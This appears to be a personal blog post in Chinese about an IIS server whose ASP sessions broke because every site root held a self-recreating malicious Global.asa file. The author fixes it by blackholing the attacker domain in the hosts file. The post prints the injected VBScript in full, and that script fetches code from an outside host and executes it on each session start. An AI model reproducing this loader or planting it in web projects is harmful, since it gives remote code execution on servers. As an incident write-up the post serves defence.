IIS被掛馬，導致 ASP 中 Session 失效的問題

幫別人維護了一個小伺服器，放了幾個小企業網站，有ASP的，也有ASP.NET的。

這段時間發現 ASP 網站登入不上，密碼不錯，而且明顯是有登入成功的跳轉，但轉眼就又回到登入頁面了。由此基本可以確定，伺服器端狀態無法保持，即 Session 無法使用。

百度了幾下，有專業的同學講的比較全，給出的方案有代碼問題，程式配置問題，也有被掛馬的問題。根據其提到的這些問題，檢查了一下發現確實每一個網站根目錄都儲存了一個名為 Global.asa 或 Global.asax 的檔案。很是賤！

使用網上說的刪除檔案的方法，試了試，可以。但過不了幾秒鐘他又會自動建立。更是賤！妹的！

扯蛋了一會兒，實在木辦法，研究一下這個檔案。內容如下：

<script language="vbscript" runat="server">'by*amingsub Application_OnStartend subsub Application_OnEndend subsub Session_OnStart    On Error Resume Next    url="http://glo.100500.com/xml/global.asaquan.txt"    Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")    ObjXMLHTTP.Open "GET",url,False    ObjXMLHTTP.setRequestHeader "User-Agent",url    ObjXMLHTTP.send    GetHtml=ObjXMLHTTP.responseBody    Set ObjXMLHTTP=Nothing    set objStream = Server.CreateObject("Adodb.Stream")    objStream.Type = 1    objStream.Mode =3    objStream.Open    objStream.Write GetHtml    objStream.Position = 0    objStream.Type = 2    objStream.Charset = "gb2312"    GetHtml = objStream.ReadText    objStream.Close    set objStream=Nothing    if instr(GetHtml,"by*aming")>0 then        execute GetHtml    end ifend sub'sub Session_OnEnd'end sub</script>

代碼裡並沒有特別惡意的東西，但是它卻請求了一個網路地址http://glo.100500.com/xml/global.asaquan.txt。開啟這個地址，果然發現一堆賤B代碼。

具體代碼不分析了，肯定是不懷好意的東西。妹的！

即然刪不掉，怎麼辦呢？

突然想到一些安全軟體用來屏蔽廣告外掛程式的方法：改Hosts檔案。

隨即開啟C:\Windows\System32\drivers\etc下的HOSTS檔案，添加一行內容：

127.0.0.1     glo.100500.com

OK，你妹的，刪掉所有Global.asa 和 Global.asax 檔案，再等一會兒，果然不會再建立了。擦。。。孫子的。。

再過幾個小時，依然安全。。。